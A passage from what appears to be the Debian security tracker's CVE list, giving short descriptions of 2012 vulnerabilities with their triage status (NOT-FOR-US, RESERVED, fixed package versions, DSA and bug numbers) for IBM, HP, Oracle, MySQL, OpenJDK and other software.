in Microdasys before ...) NOT-FOR-US: Microdasys CVE-2010-5141 (wxBitcoin and bitcoind before 0.3.5 do not properly handle script ...) - bitcoin (Fixed before initial release) CVE-2012-3342 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2012-3341 RESERVED CVE-2012-3340 RESERVED CVE-2012-3339 RESERVED CVE-2012-3338 RESERVED CVE-2012-3337 RESERVED CVE-2012-3336 RESERVED CVE-2012-3335 RESERVED CVE-2012-3334 (Stack-based buffer overflow in IBM Informix Dynamic Server (IDS) 11.50 ...) NOT-FOR-US: IBM Informix Dynamic Server CVE-2012-3333 RESERVED CVE-2012-3332 RESERVED CVE-2012-3331 RESERVED CVE-2012-3330 (The proxy server in IBM WebSphere Application Server 7.0 before ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2012-3329 (IBM Advanced Settings Utility (ASU) through 3.62 and 3.70 through 9.21 ...) NOT-FOR-US: IBM Advanced Settings Utility, Bootable Media Creator CVE-2012-3328 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset ...) NOT-FOR-US: IBM CVE-2012-3327 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset ...) NOT-FOR-US: IBM CVE-2012-3326 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2012-3325 (IBM WebSphere Application Server (WAS) 6.1.x before 6.1.0.45, 7.0.x ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2012-3324 (Directory traversal vulnerability in the UTL_FILE module in IBM DB2 ...) NOT-FOR-US: IBM DB2 CVE-2012-3323 RESERVED CVE-2012-3322 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset ...) NOT-FOR-US: IBM CVE-2012-3321 (IBM SmartCloud Control Desk 7.5 allows remote authenticated users to ...) NOT-FOR-US: IBM CVE-2012-3320 RESERVED CVE-2012-3319 (IBM Rational Business Developer 8.x before 8.0.1.4 allows remote ...) NOT-FOR-US: IBM Rational Business Developer CVE-2012-3318 RESERVED CVE-2012-3317 (IBM WebSphere Message Broker 6.1 before 6.1.0.11, 7.0 before 7.0.0.5, ...) NOT-FOR-US: IBM WebSphere CVE-2012-3316 (Cross-site scripting (XSS) vulnerability in the Tivoli Process ...) NOT-FOR-US: IBM CVE-2012-3315 (The Java servlets in the management console in IBM Tivoli Federated ...) NOT-FOR-US: IBM Tivoli CVE-2012-3314 (IBM Tivoli Federated Identity Manager (TFIM) and Tivoli Federated ...) NOT-FOR-US: IBM Tivoli CVE-2012-3313 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2012-3312 (The datasource definition editor in IBM InfoSphere Guardium 8.2 and ...) NOT-FOR-US: IBM InfoSphere Guardium CVE-2012-3311 (IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.45, 7.0 before ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2012-3310 (IBM Tivoli Federated Identity Manager (TFIM) before 6.1.1.14, 6.2.0 ...) NOT-FOR-US: IBM Tivoli CVE-2012-3309 (Cross-site request forgery (CSRF) vulnerability in the ...) NOT-FOR-US: IBM InfoSphere Guardium CVE-2012-3308 (Cross-site scripting (XSS) vulnerability in IBM Sametime 8.0.2 through ...) NOT-FOR-US: IBM Sametime CVE-2012-3307 RESERVED CVE-2012-3306 (IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.45, 7.0 before ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2012-3305 (Directory traversal vulnerability in IBM WebSphere Application Server ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2012-3304 (The Administrative Console in IBM WebSphere Application Server (WAS) ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2012-3303 RESERVED CVE-2012-3302 (Multiple cross-site scripting (XSS) vulnerabilities in IBM Lotus ...) NOT-FOR-US: IBM Lotus Domino CVE-2012-3301 (Multiple CRLF injection vulnerabilities in the HTTP server in IBM ...) NOT-FOR-US: IBM Lotus Domino CVE-2012-3300 (IBM WebSphere Commerce 7.0 before 7.0.0.6, when persistent sessions ...) NOT-FOR-US: IBM WebSphere Commerce CVE-2012-3299 RESERVED CVE-2012-3298 (Unspecified vulnerability in the REST services framework in IBM ...) NOT-FOR-US: IBM WebSphere Commerce CVE-2012-3297 (Cross-site scripting (XSS) vulnerability in the embedded HTTP server ...) NOT-FOR-US: IBM Tivoli CVE-2012-3296 (Cross-site scripting (XSS) vulnerability in the Help link in the login ...) NOT-FOR-US: IBM Power Hardware Management Console CVE-2012-3295 (IBM WebSphere MQ 7.1, when an SVRCONN channel is used, allows remote ...) NOT-FOR-US: IBM WebSphere MQ CVE-2012-3294 (Multiple cross-site request forgery (CSRF) vulnerabilities in the Web ...) NOT-FOR-US: IBM WebSphere CVE-2012-3293 (Cross-site scripting (XSS) vulnerability in the Administrative Console ...) NOT-FOR-US: IBM WebSphere CVE-2012-3292 (The GridFTP in Globus Toolkit (GT) before 5.2.2, when certain autoconf ...) {DSA-2523-1} - globus-gridftp-server 6.5-1 CVE-2012-3291 (Heap-based buffer overflow in OpenConnect 3.18 allows remote servers ...) {DSA-2495-1} - openconnect 3.18-1 (bug #677594) CVE-2012-3290 (Multiple unspecified vulnerabilities in Google Chrome before ...) NOT-FOR-US: Chrome books CVE-2012-3289 (VMware Workstation 8.x before 8.0.4, VMware Player 4.x before 4.0.4, ...) NOT-FOR-US: VMware CVE-2012-3288 (VMware Workstation 7.x before 7.1.6 and 8.x before 8.0.4, VMware ...) NOT-FOR-US: VMware CVE-2012-3287 (Poul-Henning Kamp md5crypt has insufficient algorithmic complexity and ...) NOT-FOR-US: md5crypt CVE-2012-3286 (Unspecified vulnerability in HP ArcSight Connector Appliance 6.3 and ...) NOT-FOR-US: HP ArcSight appliance CVE-2012-3285 (Unspecified vulnerability on the HP LeftHand Virtual SAN Appliance ...) NOT-FOR-US: HP LeftHand Virtual SAN Appliance CVE-2012-3284 (Unspecified vulnerability on the HP LeftHand Virtual SAN Appliance ...) NOT-FOR-US: HP LeftHand Virtual SAN Appliance CVE-2012-3283 (Unspecified vulnerability on the HP LeftHand Virtual SAN Appliance ...) NOT-FOR-US: HP LeftHand Virtual SAN Appliance CVE-2012-3282 (Unspecified vulnerability on the HP LeftHand Virtual SAN Appliance ...) NOT-FOR-US: HP LeftHand Virtual SAN Appliance CVE-2012-3281 (Unspecified vulnerability in Device Manager in HP XP P9000 Command ...) NOT-FOR-US: HP XP P9000 Command View CVE-2012-3280 (Multiple unspecified vulnerabilities on HP NonStop Servers H06.x and ...) NOT-FOR-US: HP NonStop Servers CVE-2012-3279 (Multiple cross-site scripting (XSS) vulnerabilities in HP Network Node ...) NOT-FOR-US: HP Network Node Manager i CVE-2012-3278 (Stack-based buffer overflow in magentservice.exe in HP Diagnostics ...) NOT-FOR-US: HP Diagnostics Server CVE-2012-3277 (HP OpenVMS 8.3, 8.3-1H1, and 8.4 on the Itanium platform and 7.3-2, ...) NOT-FOR-US: HP OpenVMS CVE-2012-3276 (HP OpenVMS 8.3, 8.3-1H1, and 8.4 on the Itanium platform and 7.3-2, ...) NOT-FOR-US: HP OpenVMS CVE-2012-3275 (Unspecified vulnerability in HP Network Node Manager i (NNMi) 9.1x and ...) NOT-FOR-US: HP Network Node Manager CVE-2012-3274 (Stack-based buffer overflow in uam.exe in the User Access Manager ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-3273 (Multiple unspecified vulnerabilities on the HP LaserJet Pro 400 MFP ...) NOT-FOR-US: HP LaserJet CVE-2012-3272 (Cross-site scripting (XSS) vulnerability on the HP Color LaserJet ...) NOT-FOR-US: HP LaserJet CVE-2012-3271 (Unspecified vulnerability on the HP Integrated Lights-Out 3 (aka iLO3) ...) NOT-FOR-US: HP ILO CVE-2012-3270 (Unspecified vulnerability in HP Performance Insight 5.31, 5.40, and ...) NOT-FOR-US: HP Performance Insight CVE-2012-3269 (Unspecified vulnerability in HP Performance Insight 5.31, 5.40, and ...) NOT-FOR-US: HP Performance Insight CVE-2012-3268 (Certain HP Access Controller, Fabric Module, Firewall, Router, Switch, ...) NOT-FOR-US: HP network devices CVE-2012-3267 (Unspecified vulnerability in HP Network Node Manager i (NNMi) 9.20 ...) NOT-FOR-US: HP NNMi CVE-2012-3266 (Unspecified vulnerability in IBRIX 6.1.196 through 6.1.251 on HP IBRIX ...) NOT-FOR-US: HP IBRIX CVE-2012-3265 RESERVED CVE-2012-3264 (Unspecified vulnerability in a SOAP feature in HP SiteScope 11.10 ...) NOT-FOR-US: HP SiteScope CVE-2012-3263 (Unspecified vulnerability in a SOAP feature in HP SiteScope 11.10 ...) NOT-FOR-US: HP SiteScope CVE-2012-3262 (Unspecified vulnerability in a SOAP feature in HP SiteScope 11.10 ...) NOT-FOR-US: HP SiteScope CVE-2012-3261 (Unspecified vulnerability in a SOAP feature in HP SiteScope 11.10 ...) NOT-FOR-US: HP SiteScope CVE-2012-3260 (Unspecified vulnerability in a SOAP feature in HP SiteScope 11.10 ...) NOT-FOR-US: HP SiteScope CVE-2012-3259 (Unspecified vulnerability in a SOAP feature in HP SiteScope 11.10 ...) NOT-FOR-US: HP SiteScope CVE-2012-3258 (Unspecified vulnerability in HP Operations Orchestration 9.0 before ...) NOT-FOR-US: HP Operations Orchestration CVE-2012-3257 (HP Business Availability Center (BAC) 8.07 allows remote authenticated ...) NOT-FOR-US: HP Business Availability Center CVE-2012-3256 (Cross-site request forgery (CSRF) vulnerability in HP Business ...) NOT-FOR-US: HP Business Availability Center CVE-2012-3255 (Cross-site scripting (XSS) vulnerability in HP Business Availability ...) NOT-FOR-US: HP Business Availability Center CVE-2012-3254 (Multiple unspecified vulnerabilities in HP iNode Management Center ...) NOT-FOR-US: HP iNode Management Center CVE-2012-3253 (Multiple unspecified vulnerabilities in HP Intelligent Management ...) NOT-FOR-US: HP Intelligent Management CVE-2012-3252 (Unspecified vulnerability in HP Serviceguard A.11.19 and A.11.20 ...) NOT-FOR-US: HP Serviceguard CVE-2012-3251 (Cross-site scripting (XSS) vulnerability in HP Service Manager Web ...) NOT-FOR-US: HP Service Manager CVE-2012-3250 (Unspecified vulnerability in HP Service Manager Server 7.11, 9.21, and ...) NOT-FOR-US: HP Service Manager CVE-2012-3249 (HP Fortify Software Security Center 3.1, 3.3, 3.4, and 3.5 allows ...) NOT-FOR-US: HP Fortify Software Security Center CVE-2012-3248 (HP Fortify Software Security Center 3.1, 3.3, 3.4, and 3.5 allows ...) NOT-FOR-US: HP Fortify Software Security Center CVE-2012-3247 (Unspecified vulnerability on the HP Integrity Server BL860c i2, BL870c ...) NOT-FOR-US: HP Integrity Server CVE-2012-3246 RESERVED CVE-2012-3245 RESERVED CVE-2012-3244 RESERVED CVE-2012-3243 RESERVED CVE-2012-3242 RESERVED CVE-2012-3241 (The VMware Broker in Eucalyptus 2.0.3 and 3.0.x before 3.0.2 does not ...) - eucalyptus (Fixed before initial release) CVE-2012-3240 (The Walrus service in Eucalyptus 2.0.3 and 3.0.x before 3.0.2 allows ...) - eucalyptus (Fixed before initial release) CVE-2012-3239 RESERVED CVE-2012-3238 (Cross-site scripting (XSS) vulnerability in the Backup/Restore ...) NOT-FOR-US: Astaro appliance CVE-2012-3237 RESERVED CVE-2012-3236 (fits-io.c in GIMP before 2.8.1 allows remote attackers to cause a ...) - gimp (unimportant) NOTE: Harmless crasher w/o security impact CVE-2012-3235 RESERVED CVE-2012-3234 (RealNetworks RealPlayer before 15.0.6.14, RealPlayer SP 1.0 through ...) NOT-FOR-US: RealNetworks RealPlayer CVE-2012-3233 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: Kayako Fusion 4.40.1148 CVE-2012-3232 (Cross-site scripting (XSS) vulnerability in search.php in web@all 2.0, ...) NOT-FOR-US: web@all CVE-2012-3231 (Multiple cross-site request forgery (CSRF) vulnerabilities in web@all ...) NOT-FOR-US: web@all CVE-2012-3230 (Unspecified vulnerability in the Siebel UI Framework component in ...) NOT-FOR-US: Oracle Siebel CRM CVE-2012-3229 (Unspecified vulnerability in the Siebel UI Framework component in ...) NOT-FOR-US: Oracle Siebel CRM CVE-2012-3228 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-3227 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-3226 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-3225 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-3224 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-3223 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-3222 (Unspecified vulnerability in the Oracle iRecruitment component in ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-3221 (Unspecified vulnerability in the Oracle VM Virtual Box component in ...) {DSA-2594-1} - virtualbox 4.1.18-dfsg-1.1 (bug #690777) - virtualbox-ose NOTE: http://www.halfdog.net/Security/2012/VirtualBoxSoftwareInterrupt0x8GuestCrash/ CVE-2012-3220 (Unspecified vulnerability in the Spatial component in Oracle Database ...) NOT-FOR-US: Oracle Database Server CVE-2012-3219 (Unspecified vulnerability in the Enterprise Manager Base Platform ...) NOT-FOR-US: Oracle CVE-2012-3218 (Unspecified vulnerability in the Human Resources component in Oracle ...) NOT-FOR-US: Oracle CVE-2012-3217 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3216 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774) - openjdk-7 7u3-2.1.3-1 (bug #690774) CVE-2012-3215 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11, when ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3214 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3213 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Specific to Oracle Java, not present in IcedTea) - openjdk-7 (Specific to Oracle Java, not present in IcedTea) NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected CVE-2012-3212 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11, when ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3211 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3210 (Unspecified vulnerability in Oracle Sun Solaris 11 allows remote ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3209 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11, when ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3208 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3207 (Unspecified vulnerability in Oracle Sun Solaris 9, 10, and 11 allows ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3206 (Unspecified vulnerability in the Integrated Lights Out Manager CLI in ...) NOT-FOR-US: Oracle Sun Products Suite SysFW CVE-2012-3205 (Unspecified vulnerability in Oracle Sun Solaris 11 allows local users ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3204 (Unspecified vulnerability in Oracle Sun Solaris 11 allows local users ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3203 (Unspecified vulnerability in Oracle Sun Solaris 11 allows local users ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3202 (Multiple unspecified vulnerabilities in the Oracle JRockit component ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3201 (Unspecified vulnerability in the PeopleSoft Enterprise Campus ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-3200 (Unspecified vulnerability in the Oracle Agile PLM Framework component ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2012-3199 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3198 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-3197 (Unspecified vulnerability in the MySQL Server component in Oracle ...) {DSA-2581-1} - mysql-5.1 - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3196 (Unspecified vulnerability in the Oracle Human Resources component in ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-3195 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-3194 (Unspecified vulnerability in the Oracle BI Publisher component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3193 (Unspecified vulnerability in the Oracle BI Publisher component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3192 (Unspecified vulnerability in the PeopleSoft PeopleTools component in ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-3191 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-3190 (Unspecified vulnerability in the Oracle Universal Work Queue component ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-3189 (Unspecified vulnerability in Oracle Sun Solaris 11 allows remote ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3188 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-3187 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3186 (Unspecified vulnerability in the Oracle WebCenter Sites component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3185 (Unspecified vulnerability in the Oracle WebCenter Sites component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3184 (Unspecified vulnerability in the Oracle WebCenter Sites component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3183 (Unspecified vulnerability in the Oracle WebCenter Sites component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3182 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-3181 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-3180 (Unspecified vulnerability in the MySQL Server component in Oracle ...) {DSA-2581-1} - mysql-5.1 - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3179 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-3178 (Unspecified vulnerability in the kernel in Oracle Sun Solaris 11 ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3177 (Unspecified vulnerability in the MySQL Server component in Oracle ...) {DSA-2581-1} - mysql-5.1 - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3176 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-3175 (Unspecified vulnerability in the Oracle Application Server Single ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3174 (Unspecified vulnerability in Oracle Java 7 before Update 11 allows ...) - openjdk-6 (Only affects Java 7) - openjdk-7 7u3-2.1.4-1 CVE-2012-3173 (Unspecified vulnerability in the MySQL Server component in Oracle ...) {DSA-2581-1} - mysql-5.1 - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3172 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...) NOT-FOR-US: Oracle Siebel CRM CVE-2012-3171 (Unspecified vulnerability in the Oracle Applications Technology Stack ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-3170 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...) NOT-FOR-US: Oracle Siebel CRM CVE-2012-3169 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...) NOT-FOR-US: Oracle Siebel CRM CVE-2012-3168 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...) NOT-FOR-US: Oracle Siebel CRM CVE-2012-3167 (Unspecified vulnerability in the MySQL Server component in Oracle ...) {DSA-2581-1} - mysql-5.1 - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3166 (Unspecified vulnerability in the MySQL Server component in Oracle ...) {DSA-2581-1} - mysql-5.1 - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3165 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3164 (Unspecified vulnerability in the Oracle Marketing component in Oracle ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-3163 (Unspecified vulnerability in the MySQL Server component in Oracle ...) {DSA-2581-1} - mysql-5.1 - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3162 (Unspecified vulnerability in the Oracle Applications Framework ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-3161 (Unspecified vulnerability in the Oracle Agile PLM Framework component ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2012-3160 (Unspecified vulnerability in the MySQL Server component in Oracle ...) {DSA-2581-1} - mysql-5.1 - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3159 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2012-3158 (Unspecified vulnerability in the MySQL Server component in Oracle ...) {DSA-2581-1} - mysql-5.1 - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3157 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-3156 (Unspecified vulnerability in the MySQL Server component in Oracle ...) - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3155 (Unspecified vulnerability in the CORBA ORB component in Sun GlassFish ...) - glassfish (bug #692035) CVE-2012-3154 (Unspecified vulnerability in the Oracle Agile PLM Framework component ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2012-3153 (Unspecified vulnerability in the Oracle Reports Developer component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3152 (Unspecified vulnerability in the Oracle Reports Developer component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3151 (Unspecified vulnerability in the Core RDBMS component in Oracle ...) NOT-FOR-US: Oracle Database Server CVE-2012-3150 (Unspecified vulnerability in the MySQL Server component in Oracle ...) {DSA-2581-1} - mysql-5.1 - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3149 (Unspecified vulnerability in the MySQL Server component in Oracle ...) - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3148 (Unspecified vulnerability in the Oracle Field Service component in ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-3147 (Unspecified vulnerability in the MySQL Server component in Oracle ...) - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3146 (Unspecified vulnerability in the Core RDBMS component in Oracle ...) NOT-FOR-US: Oracle Database Server CVE-2012-3145 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-3144 (Unspecified vulnerability in the MySQL Server component in Oracle ...) - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3143 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Specific to Oracle Java, not present in IcedTea) - openjdk-7 (Specific to Oracle Java, not present in IcedTea) NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected CVE-2012-3142 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-3141 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-3140 (Unspecified vulnerability in the Oracle Agile PLM For Process ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2012-3139 (Unspecified vulnerability in the Oracle Application Object Library ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-3138 (Unspecified vulnerability in the Oracle iStore component in Oracle ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-3137 (The authentication protocol in Oracle Database Server 10.2.0.3, ...) NOT-FOR-US: Oracle Database CVE-2012-3136 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u3-2.1.2-1 - openjdk-6 CVE-2012-3135 (Unspecified vulnerability in the Oracle JRockit component in Oracle ...) NOT-FOR-US: Oracle Fusion CVE-2012-3134 (Unspecified vulnerability in the Core RDBMS component in Oracle ...) NOT-FOR-US: Oracle Database Server CVE-2012-3133 (Buffer overflow in the DataDirect ODBC driver, as used in Oracle ...) NOT-FOR-US: Oracle CVE-2012-3132 (SQL injection vulnerability in Oracle Database Server 10.2.0.3, ...) NOT-FOR-US: Oracle Database CVE-2012-3131 (Unspecified vulnerability in Oracle Sun Solaris 9, 10, and 11 allows ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3130 (Unspecified vulnerability in Oracle Sun Solaris 11 allows remote ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3129 (Unspecified vulnerability in Oracle Sun Solaris 10 allows remote ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3128 (Unspecified vulnerability in Oracle SPARC T-Series Servers running ...) NOT-FOR-US: ILO firmware CVE-2012-3127 (Unspecified vulnerability in Oracle Sun Solaris 10 allows remote ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3126 (Unspecified vulnerability in the Solaris Cluster component in Oracle ...) NOT-FOR-US: Solaris Cluster CVE-2012-3125 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, and 10 allows ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3124 (Unspecified vulnerability in Oracle Sun Solaris 10 allows remote ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3123 (Unspecified vulnerability in Oracle Sun Solaris 10 allows remote ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3122 (Unspecified vulnerability in Oracle Sun Solaris 8 and 9 allows local ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3121 (Unspecified vulnerability in Oracle Sun Solaris 9 and 10 allows remote ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3120 (Unspecified vulnerability in Oracle Sun Solaris 8 allows remote ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3119 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...) NOT-FOR-US: Oracle PeopleSoft Products (PeopleSoft Enterprise HRMS) CVE-2012-3118 (Unspecified vulnerability in the PeoleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products (PeopleSoft Enterprise PeopleTools) CVE-2012-3117 (Unspecified vulnerability in the Oracle Transportation Management ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2012-3116 (Unspecified vulnerability in the Oracle Transportation Management ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2012-3115 (Unspecified vulnerability in the Oracle MapViewer component in Oracle ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3114 (Unspecified vulnerability in the Oracle Transportation Management ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2012-3113 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...) NOT-FOR-US: Oracle PeopleSoft Products (PeopleSoft Enterprise HRMS) CVE-2012-3112 (Unspecified vulnerability in Oracle Sun Solaris 10 allows remote ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3111 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products (PeopleSoft Enterprise HRMS) CVE-2012-3110 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3109 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3108 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3107 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3106 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3105 (The glBufferData function in the WebGL implementation in Mozilla ...) - iceweasel 10.0.5esr-1 [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-3104 RESERVED CVE-2011-5093 (Best Practical Solutions RT 4.x before 4.0.6 does not properly ...) NOTE: Dupe of CVE-2011-4458 CVE-2011-5092 (Best Practical Solutions RT 3.8.x before 3.8.12 and 4.x before 4.0.6 ...) NOTE: Dupe of CVE-2011-4458 CVE-2012-3103 RESERVED CVE-2012-3102 RESERVED CVE-2012-3101 RESERVED CVE-2012-3100 RESERVED CVE-2012-3099 RESERVED CVE-2012-3098 RESERVED CVE-2012-3097 RESERVED CVE-2012-3096 (Cisco Unity Connection (UC) 7.1, 8.0, and 8.5 allows remote ...) NOT-FOR-US: Cisco Unity Connection CVE-2012-3095 RESERVED CVE-2012-3094 